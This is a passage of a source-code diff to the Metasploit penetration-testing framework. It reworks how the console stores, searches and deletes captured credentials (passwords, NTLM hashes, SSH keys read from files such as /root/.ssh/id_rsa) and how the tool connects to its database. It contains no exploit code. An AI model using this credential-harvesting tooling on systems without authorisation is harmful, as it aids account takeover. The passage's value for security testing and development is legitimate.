-        info[k.to_sym] = v
-      end
-      ret[:auth_info] << info
-    end
-    ret
-  }
-  end
-
   def rpc_get_ref(name)
   ::ActiveRecord::Base.connection_pool.with_connection {
     db_check
@@ -828,42 +853,6 @@ public
   }
   end
 
-  # requires host, port, user, pass, ptype, and active
-  def rpc_report_cred(xopts)
-  ::ActiveRecord::Base.connection_pool.with_connection {
-    opts, wspace = init_db_opts_workspace(xopts)
-    res = framework.db.find_or_create_cred(opts)
-    return { :result => 'success' } if res
-    { :result => 'failed' }
-  }
-  end
-
-  #right now workspace is the only option supported
-  def rpc_creds(xopts)
-  ::ActiveRecord::Base.connection_pool.with_connection {
-    opts, wspace = init_db_opts_workspace(xopts)
-    limit = opts.delete(:limit) || 100
-    offset = opts.delete(:offset) || 0
-
-    ret = {}
-    ret[:creds] = []
-    ::Mdm::Cred.find(:all, :include => {:service => :host}, :conditions => ["hosts.workspace_id = ?",
-        framework.db.workspace.id ], :limit => limit, :offset => offset).each do |c|
-      cred = {}
-      cred[:host] = c.service.host.address if(c.service.host)
-      cred[:updated_at] = c.updated_at.to_i
-      cred[:port] = c.service.port
-      cred[:proto] = c.service.proto
-      cred[:sname] = c.service.name
-      cred[:type] = c.ptype
-      cred[:user] = c.user
-      cred[:pass] = c.pass
-      cred[:active] = c.active
-      ret[:creds] << cred
-    end
-    ret
-  }
-  end
 
   def rpc_import_data(xopts)
   ::ActiveRecord::Base.connection_pool.with_connection {
@@ -1046,7 +1035,7 @@ public
     end
 
     cdb = ""
-    if ::ActiveRecord::Base.connected?
+    if framework.db.connection_established?
       ::ActiveRecord::Base.connection_pool.with_connection { |conn|
         if conn.respond_to? :current_database
           cdb = conn.current_database
diff --git a/lib/msf/core/thread_manager.rb b/lib/msf/core/thread_manager.rb
index 2dd6f2b353..abf2aa5c48 100644
--- a/lib/msf/core/thread_manager.rb
+++ b/lib/msf/core/thread_manager.rb
@@ -99,7 +99,12 @@ class ThreadManager < Array
         begin
           argv.shift.call(*argv)
         rescue ::Exception => e
-          elog("thread exception: #{::Thread.current[:tm_name]}  critical=#{::Thread.current[:tm_crit]}  error:#{e.class} #{e} source:#{::Thread.current[:tm_call].inspect}")
+          elog(
+              "thread exception: #{::Thread.current[:tm_name]}  critical=#{::Thread.current[:tm_crit]}  " \
+              "error: #{e.class} #{e}\n" \
+              "  source:\n" \
+              "    #{::Thread.current[:tm_call].join "\n    "}"
+          )
           elog("Call Stack\n#{e.backtrace.join("\n")}")
           raise e
         ensure
diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb
index b2c585bd7c..0a5506fa03 100644
--- a/lib/msf/sanity.rb
+++ b/lib/msf/sanity.rb
@@ -33,18 +33,6 @@ if (RUBY_VERSION =~ /^1\.9\.1/)
   $stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer."
 end
 
-if(RUBY_VERSION =~ /^(1\.9|2\.0)\./)
-  # Load rubygems before changing default_internal, otherwise we may get
-  # Encoding::UndefinedConversionError as the gemspec files are loaded
-  require 'rubygems'
-  Gem::Version # trigger Rubygems to fully load
-
-  # Force binary encoding for Ruby versions that support it
-  if(Object.const_defined?('Encoding') and Encoding.respond_to?('default_external='))
-    Encoding.default_external = Encoding.default_internal = "binary"
-  end
-end
-
 if(RUBY_PLATFORM == 'java')
   require 'socket'
   s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP)
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index f507f16a28..28e7e829fd 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -408,7 +408,7 @@ class Core
     avdwarn = nil
 
     banner_trailers = {
-      :version     => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr",
+      :version     => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Metasploit::Framework::Core::GEM_VERSION} api:#{Metasploit::Framework::API::GEM_VERSION}]%clr",
       :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post",
       :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops",
       :free_trial  => "Free Metasploit Pro trial: http://r-7.co/trymsp",
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index c10fa5b899..598d64ef8d 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -18,6 +18,8 @@ class Db
   # TODO: Not thrilled about including this entire module for just store_local.
   include Msf::Auxiliary::Report
 
+  include Metasploit::Credential::Creation
+
   #
   # The dispatcher's name.
   #
@@ -217,7 +219,6 @@ class Db
     return unless active?
   ::ActiveRecord::Base.connection_pool.with_connection {
     onlyup = false
-    host_search = nil
     set_rhosts = false
     mode = :search
     delete_count = 0
@@ -580,7 +581,6 @@ class Db
       return
     end
 
-    mode = :search
     while (arg = args.shift)
       case arg
       #when "-a","--add"
@@ -648,73 +648,125 @@ class Db
   end
 
   def cmd_creds_help
-    print_line "Usage: creds [addr range]"
-    print_line "Usage: creds -a <addr range> -p <port> -t <type> -u <user> -P <pass>"
     print_line
-    print_line "  -a,--add              Add creds to the given addresses instead of listing"
-    print_line "  -d,--delete           Delete the creds instead of searching"
-    print_line "  -h,--help             Show this help information"
-    print_line "  -o <file>             Send output to a file in csv format"
-    print_line "  -p,--port <portspec>  List creds matching this port spec"
-    print_line "  -s <svc names>        List creds matching these service names"
-    print_line "  -t,--type <type>      Add a cred of this type (only with -a). Default: password"
-    print_line "  -u,--user             Add a cred for this user (only with -a). Default: blank"
-    print_line "  -P,--password         Add a cred with this password (only with -a). Default: blank"
-    print_line "  -R,--rhosts           Set RHOSTS from the results of the search"
-    print_line "  -S,--search           Search string to filter by"
-    print_line "  -c,--columns          Columns of interest"
+    print_line "With no sub-command, list credentials. If an address range is"
+    print_line "given, show only credentials with logins on hosts within that"
+    print_line "range."
 
     print_line
-    print_line "Examples:"
-    print_line "  creds               # Default, returns all active credentials"
-    print_line "  creds all           # Returns all credentials active or not"
+    print_line "Usage - Listing credentials:"
+    print_line "  creds [filter options] [address range]"
+    print_line
+    print_line "Usage - Adding credentials:"
+    print_line "  creds add-ntlm <user> <ntlm hash> [domain]"
+    print_line "  creds add-password <user> <password> [realm] [realm-type]"
+    print_line "  creds add-ssh-key <user> </path/to/id_rsa> [realm-type]"
+    print_line "Where [realm type] can be one of:"
+    Metasploit::Model::Realm::Key::SHORT_NAMES.each do |short, description|
+      print_line "  #{short} - #{description}"
+    end
+
+    print_line
+    print_line "General options"
+    print_line "  -h,--help             Show this help information"
+    print_line
+    print_line "Filter options for listing"
+    print_line "  -P,--password <regex> List passwords that match this regex"
+    print_line "  -p,--port <portspec>  List creds with logins on services matching this port spec"
+    print_line "  -s <svc names>        List creds matching comma-separated service names"
+    print_line "  -u,--user <regex>     List users that match this regex"
+
+    print_line
+    print_line "Examples, listing:"
+    print_line "  creds               # Default, returns all credentials"
     print_line "  creds 1.2.3.4/24    # nmap host specification"
     print_line "  creds -p 22-25,445  # nmap port specification"
-    print_line "  creds 10.1.*.* -s ssh,smb all"
+    print_line "  creds -s ssh,smb    # All creds associated with a login on SSH or SMB services"
+    print_line
+
+    print_line
+    print_line "Examples, adding:"
+    print_line "  # Add a user with an NTLMHash"
+    print_line "  creds add-ntlm alice 5cfe4c82d9ab8c66590f5b47cd6690f1:978a2e2e1dec9804c6b936f254727f9a"
+    print_line "  # Add a user with a blank password and a domain"
+    print_line "  creds add-password bob '' contosso"
+    print_line "  # Add a user with an SSH key"
+    print_line "  creds add-ssh-key root /root/.ssh/id_rsa"
     print_line
   end
 
-  #
-  # Can return return active or all, on a certain host or range, on a
-  # certain port or range, and/or on a service name.
-  #
-  def cmd_creds(*args)
-    return unless active?
-  ::ActiveRecord::Base.connection_pool.with_connection {
-
-    search_param = nil
-    inactive_ok = false
-    type = "password"
-
-    set_rhosts = false
-    output_file = nil
-
-    host_ranges = []
-    port_ranges = []
-    rhosts      = []
-    svcs        = []
-    delete_count = 0
-    search_term = nil
-
-    cred_table_columns = [ 'host', 'port', 'user', 'pass', 'type', 'proof', 'active?' ]
-    user = nil
-
-    # Short-circuit help
-    if args.delete "-h"
-      cmd_creds_help
-      return
+  # @param private_type [Symbol] See `Metasploit::Credential::Creation#create_credential`
+  # @param username [String]
+  # @param password [String]
+  # @param realm [String]
+  # @param realm_type [String] A key in `Metasploit::Model::Realm::Key::SHORT_NAMES`
+  def creds_add(private_type, username, password=nil, realm=nil, realm_type=nil)
+    cred_data = {
+      username: username,
+      private_data: password,
+      private_type: private_type,
+      workspace_id: framework.db.workspace,
+      origin_type: :import,
+      filename: "msfconsole"
+    }
+    if realm.present?
+      if realm_type.present?
+        realm_key = Metasploit::Model::Realm::Key::SHORT_NAMES[realm_type]
+        if realm_key.nil?
+          valid = Metasploit::Model::Realm::Key::SHORT_NAMES.keys.map{|n|"'#{n}'"}.join(", ")
+          print_error("Invalid realm type: #{realm_type}. Valid values: #{valid}")
+          return
+        end
+      end
+      realm_key ||= Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN
+      cred_data.merge!(
+        realm_value: realm,
+        realm_key: realm_key
+      )
     end
 
-    mode = :search
+    begin
+      create_credential(cred_data)
+    rescue ActiveRecord::RecordInvalid => e
+      print_error("Failed to add #{private_type}: #{e}")
+    end
+  end
+
+  def creds_add_non_replayable_hash(*args)
+    creds_add(:non_replayable_hash, *args)
+  end
+
+  def creds_add_ntlm_hash(*args)
+    creds_add(:ntlm_hash, *args)
+  end
+
+  def creds_add_password(*args)
+    creds_add(:password, *args)
+  end
+
+  def creds_add_ssh_key(username, *args)
+    key_file, realm = args
+    begin
+      key_data = File.read(key_file)
+    rescue ::Errno::EACCES, ::Errno::ENOENT => e
+      print_error("Failed to add ssh key: #{e}")
+    else
+      creds_add(:ssh_key, username, key_data, realm)
+    end
+  end
+
+  def creds_search(*args)
+    host_ranges = []
+    port_ranges = []
+    svcs        = []
+
+    #cred_table_columns = [ 'host', 'port', 'user', 'pass', 'type', 'proof', 'active?' ]
+    cred_table_columns = [ 'host', 'service', 'public', 'private', 'realm', 'private_type' ]
+    user = nil
+    delete_count = 0
+
     while (arg = args.shift)
       case arg
-      when "-a","--add"
-        mode = :add
-      when "-d"
-        mode = :delete
-      when "-h"
-        cmd_creds_help
-        return
       when '-o'
         output_file = args.shift
         if (!output_file)
@@ -745,32 +797,14 @@ class Db
           print_error("Argument required for -P")
           return
         end
-      when "-R"
-        set_rhosts = true
-      when '-S', '--search'
-        search_term = /#{args.shift}/nmi
       when "-u","--user"
         user = args.shift
         if (!user)
           print_error("Argument required for -u")
           return
         end
-      when '-c','--columns'
-        columns = args.shift
-        unless columns
-          print_error("Argument required for -c, you may use any of #{cred_table_columns.join(',')}")
-          return
-        end
-        cred_table_columns = columns.split(/[\s]*,[\s]*/).select do |col|
-          cred_table_columns.include?(col)
-        end
-        if cred_table_columns.empty?
-          print_error("Argument -c requires valid columns")
-          return
-        end
-      when "all"
-        # The user wants inactive passwords, too
-        inactive_ok = true
+      when "-d"
+        mode = :delete
       else
         # Anything that wasn't an option is a host to search for
         unless (arg_host_range(arg, host_ranges))
@@ -779,33 +813,13 @@ class Db
       end
     end
 
-    if mode == :add
-      if port_ranges.length != 1 or port_ranges.first.length != 1
-        print_error("Exactly one port required")
-        return
-      end
-      port = port_ranges.first.first
-      host_ranges.each do |range|
-        range.each do |host|
-          cred = framework.db.find_or_create_cred(
-            :host => host,
-            :port => port,
-            :user => (user == "NULL" ? nil : user),
-            :pass => (pass == "NULL" ? nil : pass),
-            :type => ptype,
-            :sname => service,
-            :active => true
-          )
-          print_status("Time: #{cred.updated_at} Credential: host=#{cred.service.host.address} port=#{cred.service.port} proto=#{cred.service.proto} sname=#{cred.service.name} type=#{cred.ptype} user=#{cred.user} pass=#{cred.pass} active=#{cred.active}")
-        end
-      end
-      return
-    end
-
     # If we get here, we're searching.  Delete implies search
     if user
       user_regex = Regexp.compile(user)
     end
+    if pass
+      pass_regex = Regexp.compile(pass)
+    end
 
     # normalize
     ports = port_ranges.flatten.uniq
@@ -815,91 +829,130 @@ class Db
       'Columns' => cred_table_columns
     }
 
-    tbl_opts.merge!(
-      'ColProps' => {
-        'pass'  => { 'MaxChar' => 64 },
-        'proof' => { 'MaxChar' => 56 }
-      }
-    ) if search_term.nil?
     tbl = Rex::Ui::Text::Table.new(tbl_opts)
 
-    creds_returned = 0
-    inactive_count = 0
-    # Now do the actual search
-    framework.db.each_cred(framework.db.workspace) do |cred|
-      # skip if it's inactive and user didn't ask for all
-      if !cred.active && !inactive_ok
-        inactive_count += 1
-        next
-      end
+    ::ActiveRecord::Base.connection_pool.with_connection {
+      query = Metasploit::Credential::Core.where(
+        workspace_id: framework.db.workspace,
+      )
 
-      if search_term
-        next unless cred.attribute_names.any? { |a| cred[a.intern].to_s.match(search_term) }
-      end
-      # Also skip if the user is searching for something and this
-      # one doesn't match
-      includes = false
-      host_ranges.map do |rw|
-        includes = rw.include? cred.service.host.address
-        break if includes
-      end
-      next unless host_ranges.empty? or includes
+      query.each do |core|
 
-      # Same for ports
-      next unless ports.empty? or ports.include? cred.service.port
+        # Exclude creds that don't match the given user
+        if user_regex.present? && !core.public.username.match(user_regex)
+          next
+        end
 
-      # Same for service names
-      next unless svcs.empty? or svcs.include?(cred.service.name)
+        # Exclude creds that don't match the given pass
+        if pass_regex.present? && !core.private.data.match(pass_regex)
+          next
+        end
 
-      if user_regex
-        next unless user_regex.match(cred.user)
-      end
+        if core.logins.empty?
+          # Skip cores that don't have any logins if the user specified a
+          # filter based on host, port, or service name
+          next if host_ranges.any? || ports.any? || svcs.any?
 
-      row = cred_table_columns.map do |col|
-        case col
-        when 'host'
-          cred.service.host.address
-        when 'port'
-          cred.service.port
-        when 'type'
-          cred.ptype
+          tbl << [
+            "", # host
+            "", # port
+            core.public,
+            core.private,
+            core.realm,
+            core.private ? core.private.class.model_name.human : "",
+          ]
         else
-          cred.send(col.intern)
+          core.logins.each do |login|
+            if svcs.present? && !svcs.include?(login.service.name)
+              next
+            end
+
+            if ports.present? && !ports.include?(login.service.port)
+              next
+            end
+
+            # If none of this Core's associated Logins is for a host within
+            # the user-supplied RangeWalker, then we don't have any reason to
+            # print it out. However, we treat the absence of ranges as meaning
+            # all hosts.
+            if host_ranges.present? && !host_ranges.any? { |range| range.include?(login.service.host.address) }
+              next
+            end
+            row = [ login.service.host.address ]
+            if login.service.name.present?
+              row << "#{login.service.port}/#{login.service.proto} (#{login.service.name})"
+            else
+              row << "#{login.service.port}/#{login.service.proto}"
+            end
+
+            row += [
+              core.public,
+              core.private,
+              core.realm,
+              core.private ? core.private.class.model_name.human : "",
+            ]
+            tbl << row
+          end
+        end
+        if mode == :delete
+          core.destroy
+          delete_count += 1
         end
       end
 
-      tbl << row
-      if mode == :delete
-        cred.destroy
-        delete_count += 1
-      end
-      if set_rhosts
-        addr = (cred.service.host.scope ? cred.service.host.address + '%' + cred.service.host.scope : cred.service.host.address )
-        rhosts << addr
-      end
-      creds_returned += 1
-    end
-
-    print_line
-    if output_file.nil?
       print_line(tbl.to_s)
-      if !inactive_ok && inactive_count > 0
-        # Then we're not printing the inactive ones. Let the user know
-        # that there are some they are not seeing and how to get at
-        # them.
-        print_line "Also found #{inactive_count} inactive creds (`creds all` to list them)"
-        print_line
-      end
-    else
-      # create the output file
-      ::File.open(output_file, "wb") { |f| f.write(tbl.to_csv) }
-      print_status("Wrote services to #{output_file}")
+      print_status("Deleted #{delete_count} creds") if delete_count > 0
+    }
+  end
+
+  #
+  # Can return return active or all, on a certain host or range, on a
+  # certain port or range, and/or on a service name.
+  #
+  def cmd_creds(*args)
+    return unless active?
+
+    # Short-circuit help
+    if args.delete "-h"
+      cmd_creds_help
+      return
     end
 
-    set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
+    subcommand = args.shift
+    case subcommand
+    when "add-ntlm"
+      creds_add_ntlm_hash(*args)
+    when "add-password"
+      creds_add_password(*args)
+    when "add-hash"
+      creds_add_non_replayable_hash(*args)
+    when "add-ssh-key"
+      creds_add_ssh_key(*args)
+    else
+      # then it's not actually a subcommand
+      args.unshift(subcommand) if subcommand
+      creds_search(*args)
+    end
 
-    print_status("Deleted #{delete_count} credentials") if delete_count > 0
-  }
+  end
+
+  def cmd_creds_tabs(str, words)
+    case words.length
+    when 1
+      # subcommands
+      tabs = [ 'add-ntlm', 'add-password', 'add-hash', 'add-ssh-key', ]
+    when 2
+      tabs = if words[1] == 'add-ssh-key'
+               tab_complete_filenames(str, words)
+             else
+               []
+             end
+    #when 5
+    #  tabs = Metasploit::Model::Realm::Key::SHORT_NAMES.keys
+    else
+      tabs = []
+    end
+    return tabs
   end
 
   def cmd_notes_help
@@ -1139,8 +1192,8 @@ class Db
           info = args.shift
           if(!info)
             print_error("Can't make loot with no info")
-          return
-        end
+            return
+          end
         when '-t'
           typelist = args.shift
           if(!typelist)
@@ -1188,8 +1241,8 @@ class Db
       range.each do |host|
         file = File.open(filename, "rb")
         contents = file.read
-        lootfile = framework.db.find_or_create_loot(:type => type, :host => host,:info => info, :data => contents,:path => filename,:name => name)
-        print_status("Added loot #{host}")
+        lootfile = framework.db.find_or_create_loot(:type => type, :host => host, :info => info, :data => contents, :path => filename, :name => name)
+        print_status("Added loot for #{host} (#{lootfile})")
       end
     end
     return
@@ -1345,7 +1398,7 @@ class Db
   def cmd_db_import(*args)
     return unless active?
   ::ActiveRecord::Base.connection_pool.with_connection {
-    if (args.include?("-h") or not (args and args.length > 0))
+    if args.include?("-h") || ! (args && args.length > 0)
       cmd_db_import_help
       return
     end
@@ -1408,8 +1461,8 @@ class Db
           next
         rescue REXML::ParseException => e
           print_error("Failed to import #{filename} due to malformed XML:")
-          print_error("#{$!.class}: #{$!}")
-          elog("Failed to import #{filename}: #{$!.class}: #{$!}")
+          print_error("#{e.class}: #{e}")
+          elog("Failed to import #{filename}: #{e.class}: #{e}")
           dlog("Call stack: #{$@.join("\n")}", LEV_3)
           next
         end
@@ -1577,7 +1630,8 @@ class Db
   #
   def cmd_db_status(*args)
     return if not db_check_driver
-    if ::ActiveRecord::Base.connected?
+
+    if framework.db.connection_established?
       cdb = ""
       ::ActiveRecord::Base.connection_pool.with_connection { |conn|
         if conn.respond_to? :current_database
@@ -1710,7 +1764,6 @@ class Db
   end
 
   def db_find_tools(tools)
-    found   = true
     missed  = []
     tools.each do |name|
       if(! Rex::FileUtils.find_full_path(name))
diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index da814689a4..48acab5890 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -179,50 +179,60 @@ class Driver < Msf::Ui::Driver
         end
       end
 
-      # Look for our database configuration in the following places, in order:
-      #	command line arguments
-      #	environment variable
-      #	configuration directory (usually ~/.msf3)
-      dbfile = opts['DatabaseYAML']
-      dbfile ||= ENV["MSF_DATABASE_CONFIG"]
-      dbfile ||= File.join(Msf::Config.get_config_root, "database.yml")
-      if (dbfile and File.exists? dbfile)
-        if File.readable?(dbfile)
-          dbinfo = YAML.load(File.read(dbfile))
-          dbenv  = opts['DatabaseEnv'] || "production"
-          db     = dbinfo[dbenv]
-        else
-          print_error("Warning, #{dbfile} is not readable. Try running as root or chmod.")
-        end
-        if not db
-          print_error("No database definition for environment #{dbenv}")
-        else
-          if not framework.db.connect(db)
-            if framework.db.error.to_s =~ /RubyGem version.*pg.*0\.11/i
-              print_error("***")
-              print_error("*")
-              print_error("* Metasploit now requires version 0.11 or higher of the 'pg' gem for database support")
-              print_error("* There a three ways to accomplish this upgrade:")
-              print_error("* 1. If you run Metasploit with your system ruby, simply upgrade the gem:")
-              print_error("*    $ rvmsudo gem install pg ")
-              print_error("* 2. Use the Community Edition web interface to apply a Software Update")
-              print_error("* 3. Uninstall, download the latest version, and reinstall Metasploit")
-              print_error("*")
-              print_error("***")
-              print_error("")
-              print_error("")
-            end
+      if framework.db.connection_established?
+        framework.db.after_establish_connection
+      else
+        # Look for our database configuration in the following places, in order:
+        #	command line arguments
+        #	environment variable
+        #	configuration directory (usually ~/.msf3)
+        dbfile = opts['DatabaseYAML']
+        dbfile ||= ENV["MSF_DATABASE_CONFIG"]
+        dbfile ||= File.join(Msf::Config.get_config_root, "database.yml")
 
-            print_error("Failed to connect to the database: #{framework.db.error}")
+        if (dbfile and File.exists? dbfile)
+          if File.readable?(dbfile)
+            dbinfo = YAML.load(File.read(dbfile))
+            dbenv  = opts['DatabaseEnv'] || Rails.env
+            db     = dbinfo[dbenv]
           else
-            self.framework.modules.refresh_cache_from_database
+            print_error("Warning, #{dbfile} is not readable. Try running as root or chmod.")
+          end
 
-            if self.framework.modules.cache_empty?
-              print_status("The initial module cache will be built in the background, this can take 2-5 minutes...")
-            end
+          if not db
+            print_error("No database definition for environment #{dbenv}")
+          else
+            framework.db.connect(db)
           end
         end
       end
+
+      # framework.db.active will be true if after_establish_connection ran directly when connection_established? was
+      # already true or if framework.db.connect called after_establish_connection.
+      if framework.db.active
+        self.framework.modules.refresh_cache_from_database
+
+        if self.framework.modules.cache_empty?
+          print_status("The initial module cache will be built in the background, this can take 2-5 minutes...")
+        end
+      elsif !framework.db.error.nil?
+        if framework.db.error.to_s =~ /RubyGem version.*pg.*0\.11/i
+          print_error("***")
+          print_error("*")
+          print_error("* Metasploit now requires version 0.11 or higher of the 'pg' gem for database support")
+          print_error("* There a three ways to accomplish this upgrade:")
+          print_error("* 1. If you run Metasploit with your system ruby, simply upgrade the gem:")
+          print_error("*    $ rvmsudo gem install pg ")
+          print_error("* 2. Use the Community Edition web interface to apply a Software Update")
+          print_error("* 3. Uninstall, download the latest version, and reinstall Metasploit")
+          print_error("*")
+          print_error("***")
+          print_error("")
+          print_error("")
+        end
+
+        print_error("Failed to connect to the database: #{framework.db.error}")
+      end
     end
 
     # Initialize the module paths only if we didn't get passed a Framework instance
diff --git a/lib/msfenv.rb b/lib/msfenv.rb
index e8dcf684f4..7a4f480830 100644
--- a/lib/msfenv.rb
+++ b/lib/msfenv.rb
@@ -2,31 +2,18 @@
 # Use bundler to load dependencies
 #
 
-GEMFILE_EXTENSIONS = [
-  '.local',
-  ''
-]
+# Override the normal rails default, so that msfconsole will come up in production mode instead of development mode
+# unless the `--environment` flag is passed.
+ENV['RAILS_ENV'] ||= 'production'
 
-unless ENV['BUNDLE_GEMFILE']
-  require 'pathname'
+require 'pathname'
+root = Pathname.new(__FILE__).expand_path.parent.parent
+config = root.join('config')
+require config.join('boot')
 
-  msfenv_real_pathname = Pathname.new(__FILE__).realpath
-  root = msfenv_real_pathname.parent.parent
-
-  GEMFILE_EXTENSIONS.each do |extension|
-    extension_pathname = root.join("Gemfile#{extension}")
-
-    if extension_pathname.readable?
-      ENV['BUNDLE_GEMFILE'] ||= extension_pathname.to_path
-      break
-    end
-  end
-end
-
-begin
-  require 'bundler/setup'
-rescue ::LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
-  exit(0)
+# Requiring environment will define the Metasploit::Framework::Application as the one and only Rails::Application in
+# this process and cause an error if a Rails.application is already defined, such as when loading msfenv through
+# msfconsole in Metasploit Pro.
+unless defined?(Rails) && !Rails.application.nil?
+  require config.join('environment')
 end
diff --git a/lib/net/ssh/key_factory.rb b/lib/net/ssh/key_factory.rb
index e416e622c6..9d5d461aec 100644
--- a/lib/net/ssh/key_factory.rb
+++ b/lib/net/ssh/key_factory.rb
@@ -35,9 +35,9 @@ module Net; module SSH
       # appropriately. The new key is returned. If the key itself is
       # encrypted (requiring a passphrase to use), the user will be
       # prompted to enter their password unless passphrase works. 
-      def load_private_key(filename, passphrase=nil)
+      def load_private_key(filename, passphrase=nil, ask_passphrase=true)
         data = File.open(File.expand_path(filename), "rb") {|f| f.read(f.stat.size)}
-        load_data_private_key(data, passphrase, filename)
+        load_data_private_key(data, passphrase, ask_passphrase, filename)
       end
 
       # Loads a private key. It will correctly determine
@@ -45,7 +45,7 @@ module Net; module SSH
       # appropriately. The new key is returned. If the key itself is
       # encrypted (requiring a passphrase to use), the user will be
       # prompted to enter their password unless passphrase works. 
-      def load_data_private_key(data, passphrase=nil, filename="")
+      def load_data_private_key(data, passphrase=nil, ask_passphrase= true, filename="")
         if data.match(/-----BEGIN DSA PRIVATE KEY-----/)
           key_type = OpenSSL::PKey::DSA
         elsif data.match(/-----BEGIN RSA PRIVATE KEY-----/)
@@ -62,7 +62,7 @@ module Net; module SSH
         begin
           return key_type.new(data, passphrase || 'invalid')
         rescue OpenSSL::PKey::RSAError, OpenSSL::PKey::DSAError => e
-          if encrypted_key
+          if encrypted_key && ask_passphrase
             tries += 1
             if tries <= 3
               passphrase = prompt("Enter passphrase for #{filename}:", false)
diff --git a/lib/rex/proto/smb/exceptions.rb b/lib/rex/proto/smb/exceptions.rb
index c7d1a99315..bc8f769836 100644
--- a/lib/rex/proto/smb/exceptions.rb
+++ b/lib/rex/proto/smb/exceptions.rb
@@ -739,11 +739,15 @@ class Error < ::RuntimeError
   # returns an error string if it exists, otherwise just the error code
   def get_error(error)
     string = ''
-    if @@errors[error]
+    if error && @@errors[error]
       string = @@errors[error]
-    else
+    elsif error
       string = sprintf('0x%.8x',error)
+    else
+      string = "Unknown error"
     end
+
+    string
   end
 end
 
@@ -781,6 +785,10 @@ class InvalidPacket < Error
   attr_accessor :word_count
   attr_accessor :command
   attr_accessor :error_code
+
+  def error_name
+    get_error(error_code)
+  end
 end
 
 class InvalidWordCount < InvalidPacket
@@ -807,7 +815,7 @@ end
 class ErrorCode < InvalidPacket
   def to_s
     'The server responded with error: ' +
-    self.get_error(self.error_code) +
+    self.error_name +
     " (Command=#{self.command} WordCount=#{self.word_count})"
   end
 end
diff --git a/lib/rex/ui/text/table.rb b/lib/rex/ui/text/table.rb
index ca1c3ec5d3..0cbb315494 100644
--- a/lib/rex/ui/text/table.rb
+++ b/lib/rex/ui/text/table.rb
@@ -275,9 +275,9 @@ protected
         nameline << pad(' ', last_col, last_idx)
 
         remainder = colprops[last_idx]['MaxWidth'] - last_col.length
-      if (remainder < 0)
-        remainder = 0
-      end
+        if (remainder < 0)
+          remainder = 0
+        end
         barline << (' ' * (cellpad + remainder))
       end
       nameline << col
@@ -305,7 +305,7 @@ protected
     last_cell = nil
     last_idx = nil
     row.each_with_index { |cell, idx|
-      if (last_cell)
+      if (idx != 0)
         line << pad(' ', last_cell.to_s, last_idx)
       end
       # line << pad(' ', cell.to_s, idx)
diff --git a/lib/tasks/database.rake b/lib/tasks/database.rake
deleted file mode 100644
index 646db409ff..0000000000
--- a/lib/tasks/database.rake
+++ /dev/null
@@ -1,73 +0,0 @@
-load 'active_record/railties/databases.rake'
-
-require 'metasploit/framework'
-require 'metasploit/framework/database'
-
-# A modification to remove dependency on Rails.env
-#
-# @see https://github.com/rails/rails/blob/ddce29bfa12462fde2342a0c2bd0eefd420c0eab/activerecord/lib/active_record/railties/databases.rake#L550
-def configs_for_environment
-  environments = [Metasploit::Framework.env]
-
-  if Metasploit::Framework.env.development?
-    environments << 'test'
-  end
-
-  environment_configurations = ActiveRecord::Base.configurations.values_at(*environments)
-  present_environment_configurations = environment_configurations.compact
-  valid_environment_configurations = present_environment_configurations.reject { |config|
-    config['database'].blank?
-  }
-
-  valid_environment_configurations
-end
-
-# emulate initializer "active_record.initialize_database" from active_record/railtie
-ActiveSupport.on_load(:active_record) do
-  self.configurations = Metasploit::Framework::Database.configurations
-  puts "Connecting to database specified by #{Metasploit::Framework::Database.configurations_pathname}"
-
-  spec = configurations[Metasploit::Framework.env]
-  establish_connection(spec)
-end
-
-#
-# Remove tasks that aren't supported
-#
-
-Rake::TaskManager.class_eval do
-  def remove_task(task_name)
-    @tasks.delete(task_name.to_s)
-  end
-end
-
-Rake.application.remove_task('db:fixtures:load')
-
-# completely replace db:load_config and db:seed as they will attempt to use
-# Rails.application, which does not exist
-Rake::Task['db:load_config'].clear
-Rake::Task['db:seed'].clear
-
-db_namespace = namespace :db do
-  task :load_config do
-    ActiveRecord::Base.configurations = Metasploit::Framework::Database.configurations
-
-    ActiveRecord::Migrator.migrations_paths = [
-        # rails isn't in Gemfile, so can't use the more appropriate
-        # Metasploit::Engine.instance.paths['db/migrate'].to_a since using
-        # Metasploit::Engine requires rails.
-        MetasploitDataModels.root.join('db', 'migrate').to_s
-    ]
-  end
-
-  desc 'Load the seed data from db/seeds.rb'
-  task :seed do
-    db_namespace['abort_if_pending_migrations'].invoke
-    seeds_pathname = Metasploit::Framework.root.join('db', 'seeds.rb')
-
-    if seeds_pathname.exist?
-      load(seeds_pathname)
-    end
-  end
-end
-
diff --git a/lib/tasks/databases.rake b/lib/tasks/databases.rake
new file mode 100644
index 0000000000..f75cd735ee
--- /dev/null
+++ b/lib/tasks/databases.rake
@@ -0,0 +1,7 @@
+namespace :db do
+  # Add onto the task so that after adding Rails.application.paths['db/migrate']
+  task :load_config do
+    # It's important to call to_a or the paths will just be relative and not realpaths
+    ActiveRecord::Migrator.migrations_paths += Metasploit::Credential::Engine.instance.paths['db/migrate'].to_a
+  end
+end
\ No newline at end of file
diff --git a/lib/tasks/rails.rake b/lib/tasks/rails.rake
deleted file mode 100644
index bcb90975aa..0000000000
--- a/lib/tasks/rails.rake
+++ /dev/null
@@ -1,21 +0,0 @@
